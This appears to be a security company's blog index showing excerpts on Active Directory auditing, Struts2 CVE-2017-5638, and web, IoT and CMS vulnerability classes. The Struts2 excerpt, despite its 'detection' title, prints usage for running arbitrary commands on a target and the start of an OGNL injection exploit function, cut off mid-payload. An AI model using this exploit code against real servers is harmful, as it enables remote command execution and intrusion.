user

Active Directory Bad Password Account Audit Script (PowerShell)

Active Directory is widely used, regardless of the size of the company or organization, to control access to internal resources.However, there are still very few organizations that perform security assessments tailored to the specific characteristics of Active Directory services.Key focus areas for an Active Directory security assessment include the Domain Controller, Group Policy, user accounts, […]

Python Detection Script for the Struts2 Vulnerability (CVE-2017-5638 – Apache Struts2 S2-045) Actively Targeted from China

(*) Reference: https://github.com/rapid7/metasploit-framework/issues/8064 * usage: $python struts2_S2-045.py <URL> <CMD> $python struts2_S2-045.py http://127.0.0.1:8080/2.3.15.1-showcase/showcase.action “ls -al” [ struts2_S2-045.py – Python Code ] #!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = “%{(#_=’multipart/form-data’).” payload += “(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).” payload += “(#_memberAccess?” payload += “(#_memberAccess=#dm):” payload += “((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).” payload += “(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).” payload += “(#ognlUtil.getExcludedPackageNames().clear()).” payload +=

NLP Deep Learning Models (HF-based)

In the world of NLP, new models pop up almost every day, making it hard to keep track of them all. Our development team needed a way to summarize and organize key details about these models, so we decided to do some research. We started by analyzing all the models listed on Hugging Face, gathering

SERVICE – INADEQUATE PERMISSION VALIDATION

Vulnerability examples   Inadequate authorization checks gaps/weaknesses that allow unauthorized users to view, modify, or delete sensitive information without going through a valid authentication process when submitting a request to a website. For example, when you edit an article on an ad, the following HTTP request is sent. The website creates a unique profile for each

SERVICE-OPEN SOURCE FILE UPLOAD VULNERABILITY

Vulnerability example    Web sites use open source tools to help manage and edit web files. Since the code is open source, security vulnerabilities can also be easily discovered, Therefore, developers/individuals need to be careful when using open source because security is open to all.   Once an attacker has confirmed that an open source library

COMMAND INJECTION IN MOBILE AND IOT

Vulnerability examples    Many IoT devices such as dual-mode routers, IP cameras, and door locks provide their management services, such as providing information or changing settings, through web pages using HTTP. These management pages come from CGI files that are already compiled into the firmware. These CGI files, when needed as specific inputs in the

SQL INJECTION IN CMS

Vulnerability Examples   SQL injection is an attack technique in which an attacker exploits security vulnerabilities toinject and execute arbitrary SQL statements, thereby manipulating the database to performabnormal operations. There are attack types such as Error SQL Injection, Blind SQLInjection, and Union based SQL Injection.    For example, in the code in the figure below, the

CROSS SITE SCRIPTING IN CMS

   Cross-site scripting (XSS) is an attack method that contains malicious scripts on a web page and is placed on the user’s side. For example, if an unverified external input value is used to create a dynamic web page, visitors to that web page will immediately see the attacker’s identity and information about the target web